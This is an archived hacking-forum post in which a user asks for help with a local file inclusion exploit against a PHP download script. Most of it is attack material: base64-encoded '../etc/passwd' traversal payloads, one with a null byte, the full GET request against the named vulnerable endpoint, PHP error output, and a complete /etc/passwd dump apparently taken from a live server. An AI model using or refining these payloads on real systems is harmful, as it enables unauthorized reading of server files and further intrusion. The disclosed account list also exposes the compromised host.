This forum is in archive mode. You will not be able to post new content.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - bl1zz4cjk

Pages: [1]
1
Hacking and Security / Question LFI
« on: October 04, 2015, 05:24:53 AM »
In sorry for my English is not very good, Good evening everyone've been working a bit on a LFI exploit I had with Acunetix, it is delivering results in me

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

this encrypted base64

 ../../../../../../../../../../etc/passwd.png

but when the same encrypted embedded form

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZC5wbmc=


It appears differently is that there must be some value escape if I cut the chain


Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v  = ../../../../../../../../../../


but these carecteres ZXRjL3Bhc3N3ZAAucG5n not me at the time of the query does not throw me the value of lfi


G:\exploits>php.exe exploitrpba.php
EXPLOIT ENVIADO: Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMC5wbmc=

GET /descargas/formularios/leearch.php?decorator=identity&form=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMC5wbmc=
<b>Warning</b>:  readfile(./../../../../../../../../../../etc/passwd%00.png.pdf)
 [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No
such file or directory in <b>/web/apache-1.3.19/htdocs/descargas/formularios/lee
arch.php</b> on line <b>7</b><br />

G:\exploits>



but with acunetix

/descargas/formularios/leearch.php?decorator=identity&form=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
ovirtagent:x:175:175:oVirt Guest Agent:/usr/share/ovirt-guest-agent:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
munin:x:498:498:Munin user:/var/lib/munin:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
nslcd:x:65:55:LDAP Client User:/:/sbin/nologin
adm:x:3996:3996::/home/adm/bin/bash



anyone could help me with some link or manual to keep learning about this behavior, thank you very much for your time

Pages: [1]


Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.